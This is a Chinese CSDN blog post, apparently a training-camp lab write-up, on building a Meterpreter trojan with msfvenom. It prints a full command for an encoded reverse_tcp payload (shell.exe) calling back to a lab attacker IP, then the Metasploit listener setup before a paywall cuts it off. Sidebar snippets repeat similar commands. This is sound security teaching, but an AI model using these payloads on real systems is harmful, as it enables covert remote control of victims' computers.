蓝盾实训营day7——meterpreter木马生成和利用

最新推荐文章于 2023-12-27 13:04:55 发布
最新推荐文章于 2023-12-27 13:04:55 发布
阅读量1.1k 收藏 7
点赞数 2
分类专栏: 网络安全 蓝盾十天网络攻防实训营记录 文章标签: meterpreter kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mingC0758/article/details/81076155
版权
本文详细介绍了如何使用Kali Linux生成meterpreter木马,并在靶机上进行利用。首先,通过设置lhost和lport生成shell.exe文件。接着,启动数据库服务并进入msf控制台选择相应攻击模块和payload。设置好参数后,等待靶机执行木马,从而获取Shell。在Shell中,可以执行各种攻击指令,如切换到cmd模式。此外,还探讨了如何将shell后台运行以及如何通过进程注入隐藏shell进程。
摘要由CSDN通过智能技术生成

meterpreter木马生成和利用

木马生成

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.188.5 lport=5555 -f exe > shell.exe

lhost 本地ip
lport 本地端口

命令完成后,会在当前目录下生成一个shell.exe可执行文件。

木马利用

获取Shell

先打开数据库服务:
service postgresql start

进入msf控制台:
msfconsole<

最低0.47元/天 解锁文章
mingC0758
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
蓝盾实训营day6——日志查看和木马清除
mingC0758的博客
07-16 960
开启服务器日志和木马清除 开启服务器日志和木马清除 根据应用服务器的不同,有不同的日志开启方法,具体方法直接百度就行,比较简单。开启日志之后,用web扫描工具对网站进行扫描,利用文件上传漏洞进行挂马,然后我们可以查看日志,如果发现有未知页面被客户端访问,则可能发生了挂马行为,查找服务器有没有该木马文件,有就删掉。 apache-php开启日志方法 打开文件: Apa...
蓝盾实训营day9——Windows主机安全加固和Android木马生成
mingC0758的博客
07-19 475
Windows主机安全加固 禁用guest账户 设置账户锁定策略 设置Administrator不允许终端登陆 使用注册表更改远程桌面监听的端口 用netstat -an 查看端口打开情况,关闭不必要的端口 关闭自动播放,防止U盘插入后病毒自动运行 7. ...
生成木马反弹和简单的Windows提权
BRMTSW的博客
03-01 658
生成木马反弹和简单的Windows提权
nmap、X-Scan漏洞扫描和Metasploit中用永恒之蓝漏洞入侵靶机并上传冰河
m0_59302403的博客
03-22 3518
利用nmap、X-Scan扫描靶机的漏洞,在Metasploit中用扫描出的永恒之蓝漏洞入侵靶机,建立连接后上传冰河木马控制靶机,最后用冰河陷阱清除靶机的冰河木马,记一次完整的入侵控制实验。
蓝盾实训营day4——文件包含漏洞
mingC0758的博客
07-12 365
解决VMware用NAT模式无法上网的问题 是因为本机的VMware的某些服务没有打开,右键计算机,点击“管理”,选择服务,打开VMware开头的服务,就可以使用NAT模式了。这个模式将本机和虚拟机连成一个局域网,这样就不会影响到外部网了。 文件包含漏洞 原理:php的include或者require可以引入外部文件。 PHP文件包含的几个函数: include():只有代码...
蓝盾防火墙命令手册——很有用的
08-18
蓝盾防火墙的操作命令手册,希望对各位有用!
蓝盾杯攻防大赛的参考资料.7z
01-15
不错的资源哦!
蓝盾防火墙操作 手册(V1.8)v1.rar
02-15
蓝盾防火墙是新一代高速状态检测的包过滤防火墙,采用专用网络处理器 集成安全系统架构,全面提升报文过滤检测、攻击检测、NAT特性的性能;同时 可实现安全业务的全方面拓展,其灵活的模块化结构综合报文过滤、...
Python-蓝盾bkci是一个开源的持续集成和持续交付系统
08-10
7. **易用性**:蓝盾bk-ci设计的目的是使研发流程可视化,因此它很可能提供了直观的用户界面,方便团队成员监控构建状态、查看测试报告以及管理部署流程。 8. **集成能力**:作为一个CI/CD系统,蓝盾bk-ci可能支持...
蓝盾(bk-ci)是一个开源的持续集成和持续交付系统-python
06-18
蓝盾(bk-ci)是一个基于Python开发的开源持续集成与持续交付系统,旨在简化和自动化软件的构建、测试和部署过程。在IT行业中,持续集成(Continuous Integration, CI)和持续交付(Continuous Delivery, CD)是现代...
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 4412
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
Metasploit 生成木马
2201_75516783的博客
11-28 777
Ox01 简介 在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马在社会工程学中是我们经常使用的手段,本次实验我们将学习如何通过Metasploit的 msfvenom命令来生成木马。 Ox02 使用msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp Ihost=103.46.128.46 lport=55497 -f exe >/home/anonymous/文件名.e
meterpreter木马原理分析
最新发布
好好学习,天天向上
12-27 1185
本文主要分析meterpreter木马的原理,原理比较简单:首先会分配一段缓冲区,加载一段shellcode,在shellcode中调用win socket API与服务器端进行通信,下载一个反射型dll,在内存中加载,使用peb的方式来获取系统的api地址,C2的地址是以整数的方式存储在代码中。
浅析木马服务端的生成技术
马说@CSDN
06-07 2755
  有些木马在解压缩之后只会有一个客户端程序,用户可以通过在客户端的一些设置工作来自动生成针对性比较强的服务端程序,例如特定的端口、击键木马的邮件地址、密码、SMTP服务器等等。在本文中,我将简要地探讨这一技术的实现。  事实上,这一技术并无神秘性可言,因为说穿了这一技术不过是对可执行文件的自定义资源进行操作罢了。也就是说,客户端程序本身绑有一段自定义的二进制数据,这段二进制数据实质上就是一个服务
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 8689
MeterpreterMetasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 8989
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
使用Msfvenom生成Ubuntu 64位木马(反向连接、正向连接)
热门推荐
zhang35的博客
04-20 1万+
环境 攻击机:Kali Linux 2020.1 172.16.252.129 靶机:Ubuntu 16.04 172.16.252.138 生成木马 使用kali自带的Msfvenom工具生成木马。 查看有哪些linux下的载荷: msfvenom -l payloads | grep linux 针对Ubuntu 64位靶机,使用linux/x64/meterpreter/reverse_t...
使用Metasploit生成木马控制Windows系统
weixin_56956399的博客
04-12 2216
使用Metasploit生成木马控制Windows系统
广州白云工商高级技校与蓝盾信息安全公司的校企合作案例
在与蓝盾公司的合作中,双方共同建立了信息安全实训室,这是一个广州市公共实训基地建设项目,拥有130平方米的场地和48个机位,能够全面覆盖网络安全专业的实训需求。实训室的建设经过一年的努力,已接近完成并进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值